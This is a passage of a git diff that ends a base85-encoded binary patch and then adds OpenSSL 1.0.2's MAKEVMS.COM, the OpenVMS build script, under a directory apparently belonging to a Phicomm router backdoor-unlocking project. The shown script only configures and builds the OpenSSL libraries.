zN|9)a(xivEiKxwKpPQ1JDu15Mfa=PGbwPV~<Kk$oNqnmGJlY_>ktQreBW+7Mx>{o`
zS9W`}X?!DnAn+>NS}8v1B$|v1<unWSQ2e^RCVQ|GJm%Tar?wZ_lX)cG9Fv`-JK7a%
zUEJE#7>jz?o17$Cm(dCKwO>mAReoJ#7xj<R)Q@hjxup{)sAOpk-k<P(L53<^(kPAw
zFkuwuw-f7xTPo`@*NS*h+_VtF;TiHnhkCuja7^k?3D%59vI<hvnD;6ZZn@T?_gG1F
zz!*{+&y?sV-mg-r9YbnEOvxVeZilqF@^~shUs|d(fdGRCHgm6%sSPZLug%O;R4Ja4
zL5inD3Hix-Qp!c~)C}eD<p96Nf4LBQL>diud?WC5<%)M;8;_J|n|?2=qMRg>2Hz#p
z<vW<=DakSYwU*mo(S+|O>B?K&-D65-yN-1J_wJsWyTcQ(*Y5i`s08JX5<xxOmoX)H
z48S)fn0xS3kymhQW>wy(wOJK;p*7jGkl-yjk-Xx*gEGHpCSK8$EE1`}ppz;RUkE>B
zPC>z#H3h5lM%@a(YqKk`rr?ac;#&@?$}8&|F+Hy#^X+si3ZhNeK>sk)@I&KTIw=6~
z2XIct<=ZSy;gH$E{O35%Ps|}RbHL0TGD=J4f2W;7=7q?Md?UCR{%7VD^kvrOg;wMh
zRORJHHW3QZKjv=0V0=YFCYF>zIdrnjOvsP{lYaDb4YB!-M;4fB^TXkF7+oI9#ys=T
zu^aBDY^VUZY<!eWttp$?c}0{&RW`*W{wC{gz>&&kO=cu-)Gb+&yii|u6-}k9&BzN;
zNk_Oiy+RTz;tJYMc9g>{s0)2rq&)L-BO1xeMY+_m+;qtKd7<mMyjqyIfRq2sMR~bM
zdoOeDnl<hB?aanPmh$?R%mq)NUO`^=6-2uQ1GbsvZ9C?f_{u(miy@R6-wPzZ@GBi{
z5!lHf4YK~2Fyj#LgDgCdW2n$ZW~$ch9*zg{23*d~bw+F|^XCvTGUocABd$rvAIW(o
zd=c|G4!?$ZKXY^45bI|y`!Aa7ff%|@px^X#klkDZbo@H=Bhe6%k$QhW*)!-1e2Dcw
zZ(Kd^X*xpBWh^h(1j2`WFQ;oA%m10>?_hazy?~J%^t{O2Tqne_1|;-IxrbOE)TNt$
zSt9ZfAk&f}kEe>^CfypMkjgT5!*udeo0D!cO*lD8z&4C2LTip^9Bu43!yNOBqdDy9
z);hh2^qBhZ2zLZ<d>c$B-xt6?6~I3mz&8Z&Zv^mr133C`)5Y`I0RBP%$Gn?#dWHgc
z(3qt&seY%^GcSNQ1@LPF_-z6F^TaXsZ$4L{28uV#e+0;XCxGLd4fNc{Ro%4zq~{mR
zPr?H$nd$c6z0O?rMKtX_xnXIIbop>Nap>R1dgMMZmiaH3qrHQf5}>D&<%d{auBeNd
zA42yJ7`aDuGe3s;V(aX!3DEzqEPp-AM_B%D<{KTZ-~Hu#Og(i9)ORm!?WF0E(Z#J-
z8yQ+dwZ6l?khitcxF^U|^2;Zz!7r@jn)XGOc*?6LG^$ro6M%kIC1-hsMNCy>CWK2T
z)9@;*z^<BL;@rtgDA0(xZrYoVgu*u7W_%UDCa0vjt)pXUPv?Zz?yklO#S`e&H#VU-
zkwwTCdPPr$ZM!?5n5LDc%w;VJm{UqU741#bTVjrlv>t-B<A9NUX4)q#mGc)S=YTr1
zMHBNw>#Ao_&j^hdTh!V?S!rI>?QB&uYqZL@vqwc=Pj^)1Z~fv{>ZyTS5Jw!~hCTxB
zFQBDi8(Z5`y=rHpvvSVt>Gc#D@@i^|gpV3z`y`UwWt1;XoGr#1R8g)wYujSJY+`BK
zdNV#iOV>AcEm>xgW}<>>VS2mjV=Fpsk_|`tur4pJx_f0~TU$p{(i@zy0xqp%n^108
zS2QYqOg^W$B0-DW8mS8>1vj-t8@tjukbGD!GhR#=Yw4zVhEA$=X(82;t8t0X<?9@e
z5hv2WjJ@boJf!$p+|ELNwBqv=*YbL7$4N>)huTpX=ov%*67Cs_Yx#)cT7IeGTK;;)
zwY+@eN4SM5+^3a1+G2^%PQ_1FT+gRGMe*aQy@YYoHCb^T&nm@>$e)C}K=E;k->Uej
zihoV<(-fC^d5F*HiodJm$18ps1j!)Tm@jZVr(f3C6@DF;_rolYgC0}$W5tWfP15xT
zN5ACbaeN<#v#wXAiiee+n-$k%hGae(^k_bs@9&8JaY|2-;(APK33KQvRq_`quJtzs
z=;=`MTF=!=9{DW!vs=mQF=5y6eIM~ZUdi9c9Pz|^v*`J=;%6y7p6}z3$GeBfS1YdN
zXF-q*4io5K<UbR@-w6m8I$%(3@D6$`PRNY1hXhC2!=TQ<h&-+V7~dWe9CZSw!TcuW
zkp>vk$k9>sR2%Af>-Z>K-rMeSxU`Q04!@kwpLci*pYL+Gyr1PFKr#~UYJ2L19R5Y-
zWe)!i^E!wBh<UHWf683?Ti}fRm-pR!9Qog{{8oqmj`?<n4>I55@Hd#t`!Adk?z_y(
zxLpx`@c(P?`lG9=u5?1EqF`QFBTm+c_5~vbe-RWhREqBju`e`K5Oh#+B^aV%fD$1=
zTxdy6C_G~rTBlPxt6f8<c9yF;6=!M|wKZl$8f@z_<2c%%GyE}aNi#pFolcn<C(QSq
zv-f-Zo!koqof%daXRY_{x!>JqpMCZ@ci(f)-S-?xuk$O4mkX}*D~j_4FhfVcXNKTU
z1o(#p*ZCFYbGzUi2QVn!Ao!sGSD#Z1I&<_S(fNf524{J7?yD@owLX#tCm)@^s4_VD
z>=AjY1Kc?n;Cjm7<fHQ=8H1D0tHNhVfDa1ZXmIk;d50E*laKOm4e);yJ{<-pAD!>m
zX>ju4w>AuW4DR$G_T?#qlV0cc`VCHcotHUiaMHgk{09Sk0uvz|GB_cf_c?5E@;OiF
zj|6zR;LbpTj@c2?d8G+b4&vma&(pF1pCNpbpkd&tvgY|p{vjy7*Pj+WDM!V%UcMFJ
z+OFOVaBa8$6yPequ1BK$RX=Kf6j%MXiM|!rd9j@VuI=Fq0j}+h^BfGyN9VcJ&M2<q
z|0@X?dL7R%4{#mNuM2P;&vym5j@#9q@G^foZvT2fuj6yICrYp5^B)KFIzAsS?Mmr&
z99|yaIu3u&>q$6AX%2y|Mhp(pS7Q*fYTaq?8+~j7YdIgJndE>A5#z0u${{{d#t(uJ
zTI9atJPFe(JMD)|7hKeiGaqgYCnN<A^JgEMJWn+}`!nPj`bKO1alW-G2m3dShxvEN
zgi%t;4-yxWa@0c#ktqFbsqhq4((k7J*i{Ynw*naR*Zv!#F6^O~5(392HmKZsT!o7o
zw{+i?^cG`0q`e;)yP$HLk;H{TNuQK+J*fP8o<)Q_!}LcaeN~{?Fnt%&M(J-48x}&9
zFsA-kC7NE_UsT>qr)$Ai%lM!a*u@d)*-QfwfuP?k9qt3c#ZZ5fW6~e2a%_qo_lMkn
zn4VKgm~&9q>=Uk;Jga)v^>fDPo1MBOm%ZHQDa^4>E~5Wqru!q+neLj-k<zwv;KWrn
zL{jWq{nlYd_EB8#^p#!?-@aw=)jHM&=iU3N;kZ=?cQl@Rr?1YfQ;XWBb#5)^HirdQ
z1{S#58d#7dPq=kei!)v>Ej;h;yeqxZ`CHMUv-4HBxcz2U|2tpfu7Yp}?^)`-Kb_0w
z3x7a1*uLJcb^8+U9Vae4-P$km{(@;>eVg(3Qc|zNe{VV*=e{us0G!COZ~y9Pk<1k{
zlU-IVBHrZ$N#9<VeJg#Nta1Cj+u*_809{=HFSPb^I!D$gw*NO8N9Ral+of1|de;wd
z(sT2%&ZDJ?9j_rSYfWUD#y^rN9-M#dQ0K@4iLMus`L-LGx@!uQyKQ>sNHb8h^3IVp
ziS2*HgxwF9!56qb`%d2)P!B!oa`||oYZVd<ZFFa!NOZl1Yn>z85?!Bik%tpqUn2Fb
z<RH$+@K%JU?`_qY8<teHpR4F_DbADaa5MBS%6i29;x(ww_VXwJB8jdMh$WIB>!Kmv
zDWF~qFSv7^!iV^H_OUle+uf9`>m0dZ+ga&8+P(Vhrlf2!4G+Dlp+QemR`<yfzBfti
zqSGdb%7%IwX=<7<^cRRw!57ta*H+hN+o!^bvp$>j)$4q(+b<mc7`>wJgC8W1LpY+|
zUmx0lq;>SWhj=L5fJ;-CT@Ux+hcoGY_aH~{H+^9WgmYheIhyo9ZMiF7DL6Ps*h;d(
zw*f=!4lizMo;oxI2*nxt1=+xvTl7M^G<2AlXtTcQ5Ls+z$DWF$J9r=8Vz{hub?7^|
z0>S%eA$_^>>}cXVVfJ6)I_{!F{2opUmgwSuDsw|Sd~6#T%f6!-v-;Be`2KBFDKnh|
ze!JHpc25`2{b^!5zkOseGIJj;lN(s-zwKg@r}ym!g;NwAXuY4VmloQBl<+03E#q<M
z`}lK(QD1fFvyxX-G8|EEI2OC~okvUBrgR=XyKPz@jW3p8Pi*HGufrd3YEmXcUk294
zdsPv%h??$HWjb41Im9+!huu7ByYeOo8P#>KtgLqV)Un}bOB@wUSEhRreEVx4R0gi`
zi^|i9&%T0qIpWDo_pMckCo|b4Rro?eYO)Tyo_a$y{CliPU*q}_gfo;;j@kHbq;}Rn
ztABQOdF3QD$VAt8r*IgM?5~}&>ay?FcVFuy#kU>w2*+Nl?i9!Dx6|1J?j(Dl^XP=c
zj+angsf6syFe#tT6d#01sl^91yS~C}-OF&xzR@<duIWIgWC5!6<&9_Io+}?d7hbWh
zzJ@=T>D-zuYI{)c$nIsyOv$pU%-q4v&AdI2Ex;P+UWDQ0u5NNw@^dH4@I0xHpTCI0
z_;xycc@Bed5bS~+hPy_vanMP2T_yIzrla*?RijwiXq_E#B|9aZot@b6G*kPAJ4$Dt
zcAQUIXU!2hTN>&t<=QWF#%7)SOrt8Ni@eUpsvq%Z_qyT(Nmgb`FUMC&u4?2nliJ+9
z;!Wjw5Cd)0*B+Yq0A1GonSW?w5qAH{#d;$%x4liTOncXKzmtOBJ|S;ZU%{ic?Hb%E
zc`J&GeEt?>iF?N1^d$cogaqq5@fm|JiQA*0kTdD#@irFQhjrq~^mkRA^Z=i#H|Q{&
z#<4fCZ=56>Km7Kr{v3b$m-lh2_GLZ~7f0GmcE3{rJ@RoozRWz~3ci50gs$hukVE%P
zIIHH_zqge-YS%{?9tZyFvk$_HGTmo?vW9uIPm-RLvkT}+)eQgre(l^f@nt3ye3}Ky
z{l13(BVR-}FC>D`;PKAVvX8+bj1QgJg0JDx`La2`H2AWOyHj1*_}J3<p$eg=iENd4
z3y<&->l{a~G~CNLeN3*+;a~-Pca4MpVoymeeIMa3D87#+XN^C%(EG7=BCZy?+!dw3
z;>W^oHm!o==lt~?zq~Ky!qQa9l;YBA@IVQS+n(c*WLgAwJT8yoNFLO~YT>~LEkhN4
zTLg3Z0N)<?HkLo;{Q<|V$oq9t-%kpy^ZNp=_zuz!@T014(tS_p8WA@>hNN3+>2$ub
zfppGKua16&tiQ$Tr)TE{FC*Ov0<-?#^vPqVjlN|XT${uRr%;INxoeZaIJ71H85|iZ
z{K5T4`JBzf71IBe(7E=B`1OKw9V!ObHhmO5bs6}|IS(oP$Vd0dbZrk<o#5LgNmBSN
z172K&8$iMmjo=vNL&nP`Zj^2aC0Zih-QkszoCi++N~4R)#7Q1@u_&LpW?W%g4#QRe
zQFu=b&K_qJ{oWY-8!`BS82t4Z{3kK^a136I`iYYBf*73j8AX3-3{D@%D0=!bMByKe
z!GAvnZ;ZiPWALsRoFkMddA=Bfe=P>*+<6oq4%DLXINw1I1Ec7F8H2~IgEkS*W%|H<
zMcxgoZRQx1_;Z4{qJ1z_0FTO-??|F>&WT3h^i3rH3c2N-O$UFj@f}6KQs}n|eItcI
zcp!$J?+VEOM?&vxJm|j=L;uwnyifS(KC8KBKtX@2p$U#g_pHJW+s@mI?qtr5h!MBl
z03-BE;xR`;KQD(ofG@?Gi|}<;%ZAmPI7Qd$J<l3GQh&=$>H3CSZoYXLwliOzzNx;p
z!EH8Bm>)fh=um|1z47Iqh~iv}Hnp_3t(LuryhwIGa(bQlybJxM3imEh?)aLJU-Dri
z1b$_v=&Gis=2i<jw<y24IBB>Y`9>(qiQU=`&nwA`&R%%0vDR_Ij_0enyF$(n&P9xa
zl{??i`XIEp1q_?pHa?gWLAg`q4Jf_4uzEv7%PMS4)Us-=7nXwfebdRS(5Fk?vq&>q
ziLRbl7Wc`b`_9p`^tvOvdz~{EW2j{tce1eN9TnZo3=vn#a34n!!@_>%jBM^{zZYL9
zl3T&0d*y=T<S#-mvQ<;Vn$<olY-W-7jccOj0t%+gH4ism&HIU6PP-nR`d$!czg2xq
zRwK?poYU8ebFzeixb@}P?@;y$3io*6%pwEnr{br4_&j1D&c2P}oR?%EANGY5|B2wF
zw{lt^H_pi`eF+&Lkp6@CDNcLHKs<?`;=29~amy!T=q;ZXgI5?n&lr4~!4Dby5`+I*
za2|fg;QCII@>CjpDQ89yh+m4I%D=(j>=P>9WpLUy#h);^rT?<Qs|@{j49-5N^7)bA
zq5S`1=&k${DL4WTm*b~=t`a=tbB&>|H1x|2Zp*dW;8z&>jRwEc;GZ}6RR(`L2Dkgv
z+xy~&hTi&WT_{~oUS{80%iCpeEC1sLuQv313~uHBOTno(-Y+%yG5n{Yx9#%+>6cR;
zzVB3dt~9vSLn;Pe9)q{U;QI`2%R69j>vQ*}!EJeeCb*VY$KF?;%~JbzWy`zB;I_Pt
z2DjyHi@|rs;Liw7c{mBL`g}14A258bGxTp8e2&3?VQ`Mol>bqKTYIHG5UgKoug;f#
z67lJVkM&8MYw+s~y_Iv3!8t#o^4x83E9ZR%zr@h*FgX1MmCqj<+~)hI24@>r`ezMp
z^Zix~{;I*PJi`Y6u;Kq-G5CygK!iYj&c{#X;oBev;?}qHS%-R@eiBMQ-`uCRUT!!1
z?ek99xaT9=+z*O9!u%MB@i$ZWiugHvk>ENGQ2Ofy*S@*pHweyo5(dTl#lBNE2E`L1
z2%q%~it`&9hNSz?<LV1n8Q}K|eN}+#^NBWrLHQ3$zO<PPimwqqI+v&TW+|82OT}*y
ze4b~M<MXoMsQ}+7_Gn>%R|=j9@R@?w2l!2bFA4BR1YaKDpAvjUfNvID?V^_JUcnm!
zdi8l;9pIl4`_dBN4T7%=@RfqM2KZ*d+XDR01m6<ie=hh#0shB=YkOw1XPj?C8MNIJ
zXPI^WN!zF5I$xCp4TIu3f2Qq6ah(s-cA~h>pQRj^JRkOr7_{D%-lL=2zv9YY>r44G
z3W4G(XQ)q=XLmra@*fIt)k7r(L{R>!x0V3c`Gbc7T;~s-3UD3w4+gl7?~ew!j^mRQ
z#K@!L^7qH*&aXv^HA%TrY0d%fbnw1QqRdo@+@^^6kdosnc^=5Aqt!T%alUtl<biZh
z?jQD1n2+8^dVfq8T+AiTeE3q3ui{dDdg{J!A<t7y&%POXvJYs3=1-q18#I4C*5V@L
z(tL8Hdqw_^9O5JLxX7U?#E9`|!&4lbGDyLwKh{yGzgvMZ|FHZiF;Giz&4#2sL3}ZO
zk@*W@Kdv({f94(Le-AL`ul5U37j{ej91Gc?deh@tT-3Ow`=%OL3r5g#ew<A#)PKLE
zPvV*lD!*cnBf|W{^oJyUb#Ng}zYA%j^w(11bEuKRQGe&*r|Gr*N9E0wWh7>h8?y{i
z-cn(DHnXtq0Tq>TP>=9>Ais#?FXDePeo^W7O!FjP%u)JCn4YsenEg6=-@j|;R3}|H
z`8}@m`w&Wya$=<LCT61Z{o6l=9f?>^)FZo8V_7%me9&vZQo3V6;sbRw_IGtbMG5<o
z$l76@MN1O(&Wx-|++89}&7s7#UIQS?@jU0aHRN*A%Eks4_^Q@zKjEfp-5O$>ijtCm
zB`GM)an|l0wQTqQ<2v1Zma)`v&%&G@q?~yTd7whlhxb#h(1(XG{beBF{e7zGIW{5B
z&=za{C$hyH_l7b7%J~#9ZbL}Re4=b|t0YR=#E7dcQ}}K~$g`mB;C#0bgyjm;uK-<?
zE!MuE+FaU9%BkrUkII`__wx_oh(EZ#KY4`d<81L>QB+dW>mk%%oGs=%IfncEA@?7q
zUyJ)QXNX~A#n3uy>*M}^&g|I^n^k@NH7+uS{RXux6e8s$NkJbd`TOiQ<5)-hvCOBR
zZDp$qf~$-sd_Wt&Z^3)9eL-$xK0T4G3mJxOtpWtZLR*yz6Uup*KF-#iZ2CA`r|D1C
z*0Dbt6+-#ntF0ry(9SVmwRQbGL7<J%AJ5fR#o3xABB<IXreO%>kFzx^gpjt>hA=%=
zqHu35)!v-Q)?7QgMo3P+-&bzN04XO-es5ELVFABJEFiz51D6uL`&Qs4ockZ!E?)8i
z*OPKzQ1o4nm|H~pFq6aYaer#({JQR)Op@ujxtRW*J<pXRWuiAr2ETf;uDgR*6TKZg
zKh~cew~u9a-k$h;BKzI+lI?G7la;Ee?LPXW=Q9~7nF;dYxryG=?7?GyJ@;?g-^_GB
zOO_wnPL6Gt_>Vi5MkTER89wotQQxzjLS=eBQJm-<tj~Vi$q(<){R7+iwIn5SVyPpi
zS4X0&3l}ooFLmJX=niJLFwy%tzH3VK9$i@ccBr2#3Ph)V78VcgJnKXna{5d3KF16)
z#YdpRJ6sl7<^-J@E$$=@l*ubS3yX`bI<f3HKThHL_3y&b^)-B)@;OS5C95BOM1=pU
z7k)5Z{C91&UH$Fly8S61#&&bpy6&z@ChpkB6h(Q$U*gOXVj1&o(|jGc>f??`ruu5#
z>$2hML~lvYlH!GP-)aBb^xOk&mzr7|m4ej<7v<rti@Tqx>|lP!uu;N4)FyhLXEEw}
zo-fA%AH%q6OlMy~O+K4W^nRA2;_4kZEb5u(J?Y`eE8@8(GAc9Iye6mf4Z-{O--Yjw
zbaC~H<}I!8sK91)>zY5FeCVO%rmN;}y7sF1SfXk3nhovn2=EI7`z32USyAqeZYnxq
zdRbGsApKZ-0KTtQ25o%+zf&ELwIgj&LuuK{z<2gfh&$g)tOMCeAJ=h@S>H>Yr+%Jv
ztv>xcM0I}iZr)<fAJzHDy7fVwk1Q6G>^!UF!^NXKV#z2vkk#1xEa8*Y^Nt#?@k;!7
zkUibeA>Q|qPnN<k$(^#63Im@ZtUZn!Y~cGR;wg75{EHf&vM*xCo32iQ-H0FCM;LAc
z5QU?+<@jiN*9L%PW9WAaeS#H)@Vq}1eH};2^NQfEEdcu=eo^__TPIlAiz8+_B>5Yz
z1^Y;HxpH0Ayt#p!Rz-Vb75Yk%k6$M1c%0TZuXl@tNv8fTjm|XB@OV_Wz<&xO{Do_p
zshZjRLx8m^c<20ihmOYIjKTlS;A}(sPI9^EJLIn&CH9xtI+cEsbf9=(S3&W~f|Jkr
z2G{i#czL41uZ!VBUqXhE&kBQcUQhFVGzR~s!EJfD-XH_{Tl_Z$xBQbNM&M;3apyJe
zKaXqsZwzp4=UW0?+xhXvD!&bTtW^XiRhpY<BmP~+J~5#kl7MZ8(Fu}L`{dIF53(s*
z6#|kj%%5W#@(jsOHvKHgKYW*=>9t)*_O1+!s~jnbR}(bhEfMGngE6Y<^jK#wOIpkZ
z9uYL1Ub+Jjs@k?~Ueondk~}d%^{>$Vh>&NPzDn}ntAuh4)2{<g(v)1+LybHV8wFtf
z6Vmir|514}$@eAyqf%f#Pov%ikY`x;Og|_Sl0W5%38DUIL!#0@A@XlEX&DXEWAl!N
zO&eQvNOuzRM`It;xlxPAk#ff~^GA_=I<1VR({>8U)!vzTq|x^g6|>f9XY^lq&((q?
z%I397(qzCwZH~g^7uq{s+bsnBa%4LF5mK8KXLEEOiMGy$Q2scZbC(dVu!#{5(__?$
zWn7!j*qlI5C6TpC`yOTCiH{zik!93)%i|FbWvz@eHm9IA!Zv#uuJT?AYa&&UDt{8D
zXFrcv*w0Eyk`wi_u9Ngao;#eeIbIbfvN;_4wzpxG?+r7}yD|SJ%uiDL|NMKhGyR-g
rBQufr#pdKH<McK<XZks#pWSQ<zb!V0V=@~;n;qBBSt*1kvN`_)LPfq-

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/makevms.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/makevms.com
new file mode 100755
index 0000000..f6b3ff2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/makevms.com
@@ -0,0 +1,1556 @@
+$!
+$! MAKEVMS.COM
+$! Original Author:  UNKNOWN
+$! Rewritten By:  Robert Byer
+$!                Vice-President
+$!                A-Com Computing, Inc.
+$!                byer@mail.all-net.net
+$!
+$! Changes by Richard Levitte <richard@levitte.org>
+$!	      Zoltan Arpadffy <zoli@polarhome.com>
+$!
+$! This procedure creates the SSL libraries of "[.xxx.EXE.CRYPTO]LIBCRYPTO.OLB"
+$! "[.xxx.EXE.SSL]LIBSSL.OLB"
+$! The "xxx" denotes the machine architecture of ALPHA, IA64 or VAX.
+$!
+$! This procedures accepts two command line options listed below.
+$!
+$! P1 specifies one of the following build options:
+$!
+$!      ALL       Just build "everything".
+$!      CONFIG    Just build the "[.CRYPTO._xxx]OPENSSLCONF.H" file.
+$!      BUILDINF  Just build the "[.CRYPTO._xxx]BUILDINF.H" file.
+$!      SOFTLINKS Just fix the Unix soft links.
+$!      BUILDALL  Same as ALL, except CONFIG, BUILDINF and SOFTILNKS aren't done.
+$!      CRYPTO    Just build the "[.xxx.EXE.CRYPTO]LIBCRYPTO.OLB" library.
+$!      CRYPTO/x  Just build the x part of the
+$!                "[.xxx.EXE.CRYPTO]LIBCRYPTO.OLB" library.
+$!      SSL       Just build the "[.xxx.EXE.SSL]LIBSSL.OLB" library.
+$!      SSL_TASK  Just build the "[.xxx.EXE.SSL]SSL_TASK.EXE" program.
+$!      TEST      Just build the "[.xxx.EXE.TEST]" test programs for OpenSSL.
+$!      APPS      Just build the "[.xxx.EXE.APPS]" application programs for OpenSSL.
+$!      ENGINES   Just build the "[.xxx.EXE.ENGINES]" application programs for OpenSSL.
+$!
+$! P2, if defined, specifies the C pointer size.  Ignored on VAX.
+$!      ("64=ARGV" gives more efficient code with HP C V7.3 or newer.)
+$!      Supported values are:
+$!
+$!      ""       Compile with default (/NOPOINTER_SIZE).
+$!      32       Compile with /POINTER_SIZE=32 (SHORT).
+$!      64       Compile with /POINTER_SIZE=64[=ARGV] (LONG[=ARGV]).
+$!               (Automatically select ARGV if compiler supports it.)
+$!      64=      Compile with /POINTER_SIZE=64 (LONG).
+$!      64=ARGV  Compile with /POINTER_SIZE=64=ARGV (LONG=ARGV).
+$!
+$! P3 specifies DEBUG or NODEBUG, to compile with or without debugging
+$!    information.
+$!
+$! P4 specifies which compiler to try to compile under.
+$!
+$!	  VAXC	 For VAX C.
+$!	  DECC	 For DEC C.
+$!	  GNUC	 For GNU C.
+$!	  LINK   To only link the programs from existing object files.
+$!               (not yet implemented)
+$!
+$! If you don't specify a compiler, it will try to determine which
+$! "C" compiler to use.
+$!
+$! P5, if defined, sets a TCP/IP library to use, through one of the following
+$! keywords:
+$!
+$!	UCX		for UCX or UCX emulation
+$!	TCPIP		for TCP/IP Services or TCP/IP Services emulation
+$!			(this is prefered over UCX)
+$!	SOCKETSHR	for SOCKETSHR+NETLIB
+$!	NONE		to avoid specifying which TCP/IP implementation to
+$!			use at build time (this works with DEC C).  This is
+$!			the default.
+$!
+$! P6, if defined, sets a compiler thread NOT needed on OpenVMS 7.1 (and up).
+$!
+$! P7, if defined, specifies a directory where ZLIB files (zlib.h,
+$! libz.olb) may be found.  Optionally, a non-default object library
+$! name may be included ("dev:[dir]libz_64.olb", for example).
+$!
+$!
+$! Announce/identify.
+$!
+$ proc = f$environment( "procedure")
+$ write sys$output "@@@ "+ -
+   f$parse( proc, , , "name")+ f$parse( proc, , , "type")
+$!
+$ DEF_ORIG = F$ENVIRONMENT( "DEFAULT")
+$ ON ERROR THEN GOTO TIDY
+$ ON CONTROL_C THEN GOTO TIDY
+$!
+$! Check if we're in a batch job, and make sure we get to 
+$! the directory this script is in
+$!
+$ IF F$MODE() .EQS. "BATCH"
+$ THEN
+$   COMNAME=F$ENVIRONMENT("PROCEDURE")
+$   COMPATH=F$PARSE("A.;",COMNAME) - "A.;"
+$   SET DEF 'COMPATH'
+$ ENDIF
+$!
+$! Check What Architecture We Are Using.
+$!
+$ IF (F$GETSYI("CPU").LT.128)
+$ THEN
+$!
+$!  The Architecture Is VAX.
+$!
+$   ARCH = "VAX"
+$!
+$! Else...
+$!
+$ ELSE
+$!
+$!  The Architecture Is Alpha, IA64 or whatever comes in the future.
+$!
+$   ARCH = F$EDIT( F$GETSYI( "ARCH_NAME"), "UPCASE")
+$   IF (ARCH .EQS. "") THEN ARCH = "UNK"
+$!
+$! End The Architecture Check.
+$!
+$ ENDIF
+$!
+$ ARCHD = ARCH
+$ LIB32 = "32"
+$ POINTER_SIZE = ""
+$!
+$! Get VMS version.
+$!
+$ VMS_VERSION = f$edit( f$getsyi( "VERSION"), "TRIM")
+$!
+$! Check To Make Sure We Have Valid Command Line Parameters.
+$!
+$ GOSUB CHECK_OPTIONS
+$!
+$! Check To See What We Are To Do.
+$!
+$ IF (BUILDCOMMAND.EQS."ALL")
+$ THEN
+$!
+$!  Start with building the OpenSSL configuration file.
+$!
+$   GOSUB CONFIG
+$!
+$!  Create The "BUILDINF.H" Include File.
+$!
+$   GOSUB BUILDINF
+$!
+$!  Fix The Unix Softlinks.
+$!
+$   GOSUB SOFTLINKS
+$!
+$ ENDIF
+$!
+$ IF (BUILDCOMMAND.EQS."ALL".OR.BUILDCOMMAND.EQS."BUILDALL")
+$ THEN
+$!
+$!  Build The [.xxx.EXE.CRYPTO]LIBCRYPTO.OLB Library.
+$!
+$   GOSUB CRYPTO
+$!
+$!  Build The [.xxx.EXE.SSL]LIBSSL.OLB Library.
+$!
+$   GOSUB SSL
+$!
+$!  Build The [.xxx.EXE.SSL]SSL_TASK.EXE DECNet SSL Engine.
+$!
+$   GOSUB SSL_TASK
+$!
+$!  Build The [.xxx.EXE.TEST] OpenSSL Test Utilities.
+$!
+$   GOSUB TEST
+$!
+$!  Build The [.xxx.EXE.APPS] OpenSSL Application Utilities.
+$!
+$   GOSUB APPS
+$!
+$!  Build The [.xxx.EXE.ENGINES] OpenSSL Shareable Engines.
+$!
+$   GOSUB ENGINES
+$!
+$! Else...
+$!
+$ ELSE
+$!
+$!    Build Just What The User Wants Us To Build.
+$!
+$     GOSUB 'BUILDCOMMAND'
+$!
+$ ENDIF
+$!
+$! Time To EXIT.
+$!
+$ GOTO TIDY
+$!
+$! Rebuild The [.CRYPTO._xxx]OPENSSLCONF.H" file.
+$!
+$ CONFIG:
+$!
+$! Tell The User We Are Creating The [.CRYPTO._xxx]OPENSSLCONF.H File.
+$!
+$ WRITE SYS$OUTPUT "Creating [.CRYPTO.''ARCHD']OPENSSLCONF.H Include File."
+$!
+$! First, make sure the directory exists.
+$!
+$ IF F$PARSE("SYS$DISK:[.CRYPTO.''ARCHD']") .EQS. "" THEN -
+     CREATE/DIRECTORY SYS$DISK:[.CRYPTO.'ARCHD']
+$!
+$! Different tar/UnZip versions/option may have named the file differently
+$ IF F$SEARCH("[.crypto]opensslconf.h_in") .NES. ""
+$ THEN
+$   OPENSSLCONF_H_IN = "[.crypto]opensslconf.h_in"
+$ ELSE
+$   IF F$SEARCH( "[.crypto]opensslconf_h.in") .NES. ""
+$   THEN
+$     OPENSSLCONF_H_IN = "[.crypto]opensslconf_h.in"
+$   ELSE
+$     ! For ODS-5
+$     IF F$SEARCH( "[.crypto]opensslconf.h.in") .NES. ""
+$     THEN
+$       OPENSSLCONF_H_IN = "[.crypto]opensslconf.h.in"
+$     ELSE
+$       WRITE SYS$ERROR "Couldn't find a [.crypto]opensslconf.h.in.  Exiting!"
+$       $STATUS = %X00018294 ! "%RMS-F-FNF, file not found".
+$       GOTO TIDY
+$     ENDIF
+$   ENDIF
+$ ENDIF
+$!
+$! Create The [.CRYPTO._xxx]OPENSSLCONF.H File.
+$! Make sure it has the right format.
+$!
+$ OSCH_NAME = "SYS$DISK:[.CRYPTO.''ARCHD']OPENSSLCONF.H"
+$ CREATE /FDL=SYS$INPUT: 'OSCH_NAME'
+RECORD
+        FORMAT stream_lf
+$ OPEN /APPEND H_FILE 'OSCH_NAME'
+$!
+$! Write The [.CRYPTO._xxx]OPENSSLCONF.H File.
+$!
+$ WRITE H_FILE "/* This file was automatically built using makevms.com */"
+$ WRITE H_FILE "/* and ''OPENSSLCONF_H_IN' */"
+$!
+$! Write a few macros that indicate how this system was built.
+$!
+$ WRITE H_FILE ""
+$ WRITE H_FILE "#ifndef OPENSSL_SYS_VMS"
+$ WRITE H_FILE "# define OPENSSL_SYS_VMS"
+$ WRITE H_FILE "#endif"
+$!
+$! One of the best way to figure out what the list should be is to do
+$! the following on a Unix system:
+$!   grep OPENSSL_NO_ crypto/*/*.h ssl/*.h engines/*.h engines/*/*.h|grep ':# *if'|sed -e 's/^.*def //'|sort|uniq
+$! For that reason, the list will also always end up in alphabetical order
+$ CONFIG_LOGICALS := AES,-
+		     ASM,INLINE_ASM,-
+		     BF,-
+		     BIO,-
+		     BUFFER,-
+		     BUF_FREELISTS,-
+		     CAMELLIA,-
+		     CAST,-
+		     CMS,-
+		     COMP,-
+		     DEPRECATED,-
+		     DES,-
+		     DGRAM,-
+		     DH,-
+		     DSA,-
+		     EC,-
+		     EC2M,-
+		     ECDH,-
+		     ECDSA,-
+		     EC_NISTP_64_GCC_128,-
+		     ENGINE,-
+		     ERR,-
+		     EVP,-
+		     FP_API,-
+		     GMP,-
+		     GOST,-
+		     HASH_COMP,-
+		     HEARTBEATS,-
+		     HMAC,-
+		     IDEA,-
+		     JPAKE,-
+		     KRB5,-
+		     LHASH,-
+		     MD2,-
+		     MD4,-
+		     MD5,-
+		     MDC2,-
+		     NEXTPROTONEG,-
+		     OCSP,-
+		     PSK,-
+		     RC2,-
+		     RC4,-
+		     RC5,-
+		     RFC3779,-
+		     RIPEMD,-
+		     RSA,-
+		     SCTP,-
